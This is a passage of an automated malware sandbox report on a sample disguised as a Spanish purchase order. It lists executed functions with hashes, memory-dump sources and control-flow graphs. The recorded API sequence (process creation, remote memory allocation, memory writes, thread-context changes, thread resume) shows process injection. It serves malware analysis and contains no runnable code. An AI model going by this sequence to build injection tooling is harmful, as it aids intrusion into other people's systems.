4e2773d 29797->29799 29799->29722 29801 4e27934 ReadProcessMemory 29800->29801 29803 4e279c7 29801->29803 29803->29724 29805 4e27983 ReadProcessMemory 29804->29805 29807 4e279c7 29805->29807 29807->29724 29809 4e27208 ResumeThread 29808->29809 29811 4e27239 29809->29811 29811->29742 29813 4e27208 ResumeThread 29812->29813 29815 4e27239 29813->29815 29815->29742 29817 4e27848 WriteProcessMemory 29816->29817 29819 4e278e7 29817->29819 29819->29757 29821 4e27890 WriteProcessMemory 29820->29821 29823 4e278e7 29821->29823 29823->29757 29825 4e27788 VirtualAllocEx 29824->29825 29827 4e27805 29825->29827 29827->29781 29829 4e277c8 VirtualAllocEx 29828->29829 29831 4e27805 29829->29831 29831->29781

                                            Executed Functions

                                            Function 058B9338 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !Y3E
                                            • API String ID: 0-2826621527
                                            • Opcode ID: a286a92ccfe10331149ddbf8bd3ca70cce8dd01bdbcaa30b5abfd69a2f0b5647
                                            • Instruction ID: 04463e9e0eeb87fee36bab689514248ed94a03560bb9f8933a5ac1f50c4807f3
                                            • Opcode Fuzzy Hash: a286a92ccfe10331149ddbf8bd3ca70cce8dd01bdbcaa30b5abfd69a2f0b5647
                                            • Instruction Fuzzy Hash: 77A19234B002199FE754DB79C858BAE7BF7BB88700F208469E906EB3A5DE74DC418B51
                                            Function 058BDD70 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T(z
                                            • API String ID: 0-3184255237
                                            • Opcode ID: d89105c83b3b225cbcfef76c84ac78f826e6461407eb5f48fbbc4c3fb01173d9
                                            • Instruction ID: 79504aa1a99613bb6b625f9ba3f093280cb976ec6ed4c753f3770f3303d285c0
                                            • Opcode Fuzzy Hash: d89105c83b3b225cbcfef76c84ac78f826e6461407eb5f48fbbc4c3fb01173d9
                                            • Instruction Fuzzy Hash: 04412A72F01209DBEB08DBB989517FFB6ABABC8604F149426D941EB344DAB29D018B51
                                            Function 058B9328 Relevance: .3, Instructions: 279COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c91fca491c69ab883dc2f5d84c1187236c8786079306e4feb6f50e333e71d1c6
                                            • Instruction ID: b108d4961008e2803d80b032c8baf852da89d3f694d14f8adee91d99491ef775
                                            • Opcode Fuzzy Hash: c91fca491c69ab883dc2f5d84c1187236c8786079306e4feb6f50e333e71d1c6
                                            • Instruction Fuzzy Hash: D6A19F34B102199FEB44DB78C854BAE7BF7BB88700F108469EA06EB3A5DE749C418B51
                                            Function 058B94CB Relevance: .2, Instructions: 159COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b642ec614a01386601ba36d9399e9f2239937d66a00e8b714d657325ecb39b0c
                                            • Instruction ID: b44fe7b0c878d4bb1afa867f6d1c071355f4006f61649251c4eb1129d5f8ea46
                                            • Opcode Fuzzy Hash: b642ec614a01386601ba36d9399e9f2239937d66a00e8b714d657325ecb39b0c
                                            • Instruction Fuzzy Hash: BA51AF34B412099FEB149F74D855BAE7AE7FB88700F20806AEA02EB395DA75CD418B50
                                            Function 04E2D53C Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b045789f9415cc302e3ebb08aefa0effb36a39366f45a7d91d626587d6ce8dd3
                                            • Instruction ID: 0b15713fee9d8b125630211d2826d37e4bcb73a60706a1a4ca4bf8d225ec6bb4
                                            • Opcode Fuzzy Hash: b045789f9415cc302e3ebb08aefa0effb36a39366f45a7d91d626587d6ce8dd3
                                            • Instruction Fuzzy Hash: 77C04C25F4D528D6C9504D947D059F8FB3CD38F127F407151D30EA3012A260A1556554
                                            Function 04E27AC5 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 4e27ac5-4e27b65 3 4e27b67-4e27b71 0->3 4 4e27b9e-4e27bbe 0->4 3->4 5 4e27b73-4e27b75 3->5 9 4e27bc0-4e27bca 4->9 10 4e27bf7-4e27c26 4->10 7 4e27b77-4e27b81 5->7 8 4e27b98-4e27b9b 5->8 11 4e27b83 7->11 12 4e27b85-4e27b94 7->12 8->4 9->10 13 4e27bcc-4e27bce 9->13 20 4e27c28-4e27c32 10->20 21 4e27c5f-4e27d19 CreateProcessA 10->21 11->12 12->12 14 4e27b96 12->14 15 4e27bd0-4e27bda 13->15 16 4e27bf1-4e27bf4 13->16 14->8 18 4e27bde-4e27bed 15->18 19 4e27bdc 15->19 16->10 18->18 22 4e27bef 18->22 19->18 20->21 23 4e27c34-4e27c36 20->23 32 4e27d22-4e27da8 21->32 33 4e27d1b-4e27d21 21->33 22->16 25 4e27c38-4e27c42 23->25 26 4e27c59-4e27c5c 23->26 27 4e27c46-4e27c55 25->27 28 4e27c44 25->28 26->21 27->27 29 4e27c57 27->29 28->27 29->26 43 4e27daa-4e27dae 32->43 44 4e27db8-4e27dbc 32->44 33->32 43->44 45 4e27db0 43->45 46 4e27dbe-4e27dc2 44->46 47 4e27dcc-4e27dd0 44->47 45->44 46->47 48 4e27dc4 46->48 49 4e27dd2-4e27dd6 47->49 50 4e27de0-4e27de4 47->50 48->47 49->50 51 4e27dd8 49->51 52 4e27df6-4e27dfd 50->52 53 4e27de6-4e27dec 50->53 51->50 54 4e27e14 52->54 55 4e27dff-4e27e0e 52->55 53->52 57 4e27e15 54->57 55->54 57->57
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04E27D06
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 45fd3005423337a4cd6e094ddacf5669df638f6cf6aa6a53e6953b0dc97b706f
                                            • Instruction ID: cae2b3dfccd97acf09f1c59eee956921846614745631762b4d32ae038effaab6
                                            • Opcode Fuzzy Hash: 45fd3005423337a4cd6e094ddacf5669df638f6cf6aa6a53e6953b0dc97b706f
                                            • Instruction Fuzzy Hash: 63A14071D00229DFEB14DF68C941BEDBBB2FF49314F1485AAE808A7240DB75A985CF91
                                            Function 04E27AD0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 58 4e27ad0-4e27b65 60 4e27b67-4e27b71 58->60 61 4e27b9e-4e27bbe 58->61 60->61 62 4e27b73-4e27b75 60->62 66 4e27bc0-4e27bca 61->66 67 4e27bf7-4e27c26 61->67 64 4e27b77-4e27b81 62->64 65 4e27b98-4e27b9b 62->65 68 4e27b83 64->68 69 4e27b85-4e27b94 64->69 65->61 66->67 70 4e27bcc-4e27bce 66->70 77 4e27c28-4e27c32 67->77 78 4e27c5f-4e27d19 CreateProcessA 67->78 68->69 69->69 71 4e27b96 69->71 72 4e27bd0-4e27bda 70->72 73 4e27bf1-4e27bf4 70->73 71->65 75 4e27bde-4e27bed 72->75 76 4e27bdc 72->76 73->67 75->75 79 4e27bef 75->79 76->75 77->78 80 4e27c34-4e27c36 77->80 89 4e27d22-4e27da8 78->89 90 4e27d1b-4e27d21 78->90 79->73 82 4e27c38-4e27c42 80->82 83 4e27c59-4e27c5c 80->83 84 4e27c46-4e27c55 82->84 85 4e27c44 82->85 83->78 84->84 86 4e27c57 84->86 85->84 86->83 100 4e27daa-4e27dae 89->100 101 4e27db8-4e27dbc 89->101 90->89 100->101 102 4e27db0 100->102 103 4e27dbe-4e27dc2 101->103 104 4e27dcc-4e27dd0 101->104 102->101 103->104 105 4e27dc4 103->105 106 4e27dd2-4e27dd6 104->106 107 4e27de0-4e27de4 104->107 105->104 106->107 108 4e27dd8 106->108 109 4e27df6-4e27dfd 107->109 110 4e27de6-4e27dec 107->110 108->107 111 4e27e14 109->111 112 4e27dff-4e27e0e 109->112 110->109 114 4e27e15 111->114 112->111 114->114
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04E27D06
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: d5e135a318a935ec351fec93cc3b3a78e0ac9bb1877e81dd5806abde283667a3
                                            • Instruction ID: dd4163328bd70273d0e563942620fc81db8671934381ee8a58dc82d41de0e428
                                            • Opcode Fuzzy Hash: d5e135a318a935ec351fec93cc3b3a78e0ac9bb1877e81dd5806abde283667a3
                                            • Instruction Fuzzy Hash: 36914071D00229DFEB14DF68C941BEEBBB2FF49314F1485AAE808A7240DB759985CF91
                                            Function 02C846A0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 115 2c846a0-2c85e79 CreateActCtxA 118 2c85e7b-2c85e81 115->118 119 2c85e82-2c85edc 115->119 118->119 126 2c85eeb-2c85eef 119->126 127 2c85ede-2c85ee1 119->127 128 2c85f00 126->128 129 2c85ef1-2c85efd 126->129 127->126 131 2c85f01 128->131 129->128 131->131
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02C85E69
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2c80000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 1f69393fef268532dbacd3c2da567443fc20489fcdbe021487f8181b4c51b887
                                            • Instruction ID: 5f7ead5571031d6c0d915e8d0d0178d435de603e90b892c96f89202c6fedcac6
                                            • Opcode Fuzzy Hash: 1f69393fef268532dbacd3c2da567443fc20489fcdbe021487f8181b4c51b887
                                            • Instruction Fuzzy Hash: 4341E371C0071DCBDB24DFA9C88478EBBB5BF48708F60815AD408AB255DBB56945CF90
                                            Function 02C85DAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 132 2c85dac-2c85db3 133 2c85db8-2c85e79 CreateActCtxA 132->133 135 2c85e7b-2c85e81 133->135 136 2c85e82-2c85edc 133->136 135->136 143 2c85eeb-2c85eef 136->143 144 2c85ede-2c85ee1 136->144 145 2c85f00 143->145 146 2c85ef1-2c85efd 143->146 144->143 148 2c85f01 145->148 146->145 148->148
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02C85E69
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2c80000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 322f683c153bdc0ab89509b28fd752e318903728e96fb6663958da79562027aa
                                            • Instruction ID: 071d6eb9651337b0b9e88127af43416f42613ae9e62245cb3f018cc1582f9292
                                            • Opcode Fuzzy Hash: 322f683c153bdc0ab89509b28fd752e318903728e96fb6663958da79562027aa
                                            • Instruction Fuzzy Hash: A541F2B1C00719CFDB24DFA9C884B8EBBB5BF88708F60815AD408AB255DBB56945CF90
                                            Function 04E27840 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 149 4e27840-4e27896 152 4e278a6-4e278e5 WriteProcessMemory 149->152 153 4e27898-4e278a4 149->153 155 4e278e7-4e278ed 152->155 156 4e278ee-4e2791e 152->156 153->152 155->156
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E278D8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: ac18228a9a92004ed6f79f397c7f9bc006941ae230a21a9899fced31790b8d57
                                            • Instruction ID: eb5cbd6636cf6d74ef3e20b3252a6a539be16073ef6fe1a30c3d1efae8942533
                                            • Opcode Fuzzy Hash: ac18228a9a92004ed6f79f397c7f9bc006941ae230a21a9899fced31790b8d57
                                            • Instruction Fuzzy Hash: 20215A71900319DFDB10CFA9C981BDEBBF5FF48310F148429E958A7240D778A950CBA5
                                            Function 04E27848 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 160 4e27848-4e27896 162 4e278a6-4e278e5 WriteProcessMemory 160->162 163 4e27898-4e278a4 160->163 165 4e278e7-4e278ed 162->165 166 4e278ee-4e2791e 162->166 163->162 165->166
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E278D8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 523e2fbd969c49b59d428abda8c5b34cb82af6525becf94fc19139e686892cb5
                                            • Instruction ID: 7328ad154c990d75b605fad73ec23b3c9d7e6567c551c4ef9f578a424fe1c5a5
                                            • Opcode Fuzzy Hash: 523e2fbd969c49b59d428abda8c5b34cb82af6525becf94fc19139e686892cb5
                                            • Instruction Fuzzy Hash: 6B2136B1900359DFDB10CFA9C981BDEBBF5FF88310F14842AE958A7240D778A950CBA5
                                            Function 04E27930 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 170 4e27930-4e27932 171 4e27934-4e27936 170->171 172 4e27938-4e279c5 ReadProcessMemory 170->172 171->172 175 4e279c7-4e279cd 172->175 176 4e279ce-4e279fe 172->176 175->176
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E279B8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 5fc3692674ab874603b33888e80d32c3eec6c81b34a991e2a97d0121c687b302
                                            • Instruction ID: 0432ccb42472838c73c65d500fd8e5697badfce76e0afd8d559746fc7b90a450
                                            • Opcode Fuzzy Hash: 5fc3692674ab874603b33888e80d32c3eec6c81b34a991e2a97d0121c687b302
                                            • Instruction Fuzzy Hash: 5B2136B18003599FDB10CFAAC881BEEBBF5FF48310F508429E959A7250D738A950CBA4
                                            Function 04E276A9 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 186 4e276a9-4e276fb 188 4e2770b-4e2773b Wow64SetThreadContext 186->188 189 4e276fd-4e27709 186->189 191 4e27744-4e27774 188->191 192 4e2773d-4e27743 188->192 189->188 192->191
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E2772E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 9fdc9b1c080d1fd0cd98c02bbe8abce5e9d3333f28ad1840d3284111878c7f45
                                            • Instruction ID: 53419dd616b6e038dcd56fc4bc050aa6ab3a581da693f37020a9ebfd5ac7a8f6
                                            • Opcode Fuzzy Hash: 9fdc9b1c080d1fd0cd98c02bbe8abce5e9d3333f28ad1840d3284111878c7f45
                                            • Instruction Fuzzy Hash: F2216871D002098FEB10CFA9C4857EEBBF1EF88324F14842AD419A7240DB78A945CFA4
                                            Function 02C8B914 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 180 2c8b914-2c8df9c DuplicateHandle 182 2c8df9e-2c8dfa4 180->182 183 2c8dfa5-2c8dfc2 180->183 182->183
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C8DECE,?,?,?,?,?), ref: 02C8DF8F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2c80000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: a2ad691f19effd604294673eb554f81a5d001ee5fcd4129ca6bf8ca06f2b3f5d
                                            • Instruction ID: a2b6cd8895b96916962e71c8cc8d9e18f836842b1e4f6248f1796011556f0237
                                            • Opcode Fuzzy Hash: a2ad691f19effd604294673eb554f81a5d001ee5fcd4129ca6bf8ca06f2b3f5d
                                            • Instruction Fuzzy Hash: DE2114B5900208EFDB10DFAAD884ADEBBF4FB48324F14841AE918A3350D375A950CFA4
                                            Function 04E276B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 196 4e276b0-4e276fb 198 4e2770b-4e2773b Wow64SetThreadContext 196->198 199 4e276fd-4e27709 196->199 201 4e27744-4e27774 198->201 202 4e2773d-4e27743 198->202 199->198 202->201
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E2772E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: d7cea8b9d2a6c7fdc02878d561f9b488bac898950f0760d103bbfba9dd70f612
                                            • Instruction ID: a25c7a754128c5b58f4c5b53cc2a7c1dda77fc3ccecd98d70cd1d79b617b1c8a
                                            • Opcode Fuzzy Hash: d7cea8b9d2a6c7fdc02878d561f9b488bac898950f0760d103bbfba9dd70f612
                                            • Instruction Fuzzy Hash: 82214971D003098FDB10DFAAC485BEEBBF4EF88324F148429D559A7240DB78A944CFA5
                                            Function 04E27938 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 206 4e27938-4e279c5 ReadProcessMemory 209 4e279c7-4e279cd 206->209 210 4e279ce-4e279fe 206->210 209->210
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E279B8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: cfdef9794715f62438922db69be6a86a2d11478c2810293339b16eace7d88675
                                            • Instruction ID: a4eb485ea8a9cf56ceef6d938c743d7cc1420b2ff017c580c84a4ac93d0a7318
                                            • Opcode Fuzzy Hash: cfdef9794715f62438922db69be6a86a2d11478c2810293339b16eace7d88675
                                            • Instruction Fuzzy Hash: F32128B18003599FDB10DFAAC881ADEBBF5FF48310F148429E559A7250D7389550CBA5
                                            Function 04E29EF4 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 214 4e29ef4-4e2a6ca 216 4e2a6d6-4e2a706 EnumThreadWindows 214->216 217 4e2a6cc-4e2a6d4 214->217 218 4e2a708-4e2a70e 216->218 219 4e2a70f-4e2a73c 216->219 217->216 218->219
                                            APIs
                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,04E2A668,03DA4108,02DC4530), ref: 04E2A6F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: EnumThreadWindows
                                            • String ID:
                                            • API String ID: 2941952884-0
                                            • Opcode ID: fa2047c7f20cd0671e8e03d6fd17955b4c41599a49c0007d677b4f2a0c6cd43b
                                            • Instruction ID: bf65c7a1485cec38296d9d0ece50c5d435f1fc5cc9de1c7be7a30cac28cd75fd
                                            • Opcode Fuzzy Hash: fa2047c7f20cd0671e8e03d6fd17955b4c41599a49c0007d677b4f2a0c6cd43b
                                            • Instruction Fuzzy Hash: 1F2129B19002598FDB10CF9AC944BEEFBF4FB88310F14842AD455A7350D774A944CFA5
                                            Function 04E2A681 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 223 4e2a681-4e2a6ca 225 4e2a6d6-4e2a706 EnumThreadWindows 223->225 226 4e2a6cc-4e2a6d4 223->226 227 4e2a708-4e2a70e 225->227 228 4e2a70f-4e2a73c 225->228 226->225 227->228
                                            APIs
                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,04E2A668,03DA4108,02DC4530), ref: 04E2A6F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: EnumThreadWindows
                                            • String ID:
                                            • API String ID: 2941952884-0
                                            • Opcode ID: 6fefb26613470d6ae87b0ff55227deedb8f6af2a2ffedc99412c97557c4378bf
                                            • Instruction ID: 35df8be2dd718e2486f2ee0e16bc422fee42e957d9c8ab083c1e886660f9e894
                                            • Opcode Fuzzy Hash: 6fefb26613470d6ae87b0ff55227deedb8f6af2a2ffedc99412c97557c4378bf
                                            • Instruction Fuzzy Hash: 062127B190025A8FEB14CF9AC985BEEFBF4FB88320F14842AD455A7250D778A944CF65
                                            Function 04E28DC0 Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 232 4e28dc0-4e2abbb 234 4e2abc3-4e2abc7 232->234 235 4e2abbd-4e2abc0 232->235 236 4e2abc9-4e2abcc 234->236 237 4e2abcf-4e2ac02 MessageBoxW 234->237 235->234 236->237 238 4e2ac04-4e2ac0a 237->238 239 4e2ac0b-4e2ac1f 237->239 238->239
                                            APIs
                                            • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,04E293D9,?,?,?), ref: 04E2ABF5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Message
                                            • String ID:
                                            • API String ID: 2030045667-0
                                            • Opcode ID: fb360ea089eb6b4478ba8103424d3d562fde2dcccb0866e38ced9acf5d70da85
                                            • Instruction ID: 0080091aa19f23db65ea9813ab48397a53f9a87fb82de2551cf1fc57ecc2ebb5
                                            • Opcode Fuzzy Hash: fb360ea089eb6b4478ba8103424d3d562fde2dcccb0866e38ced9acf5d70da85
                                            • Instruction Fuzzy Hash: C72104B6900359DFDB10CF9AC984ADEFBB5FB48314F14856EE918A7200D375A544CBA4
                                            Function 04E2AB73 Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 241 4e2ab73-4e2abbb 243 4e2abc3-4e2abc7 241->243 244 4e2abbd-4e2abc0 241->244 245 4e2abc9-4e2abcc 243->245 246 4e2abcf-4e2ac02 MessageBoxW 243->246 244->243 245->246 247 4e2ac04-4e2ac0a 246->247 248 4e2ac0b-4e2ac1f 246->248 247->248
                                            APIs
                                            • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,04E293D9,?,?,?), ref: 04E2ABF5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Message
                                            • String ID:
                                            • API String ID: 2030045667-0
                                            • Opcode ID: 1cdc4ec0f18903910e08fa7584f6423214cf6a3b6c8487ec46c9a541d5fa775d
                                            • Instruction ID: 92c07f0ae3e76eef9987992ce4065b6068690809ba41e8bbe94396deeebe50a1
                                            • Opcode Fuzzy Hash: 1cdc4ec0f18903910e08fa7584f6423214cf6a3b6c8487ec46c9a541d5fa775d
                                            • Instruction Fuzzy Hash: 122133B6800319DFDB10CF9AD984ADEFBB5FB88314F10842EE818A7600C374A584CFA4
                                            Function 04E27781 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E277F6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 665772e80dd6d6f43ccacc0924b96010f06b2c78d5e7d3c29df79d24a84167a7
                                            • Instruction ID: ddeae5343a82550c5508aa78247c15d11764a51b39b5a95e363386df6b26cddc
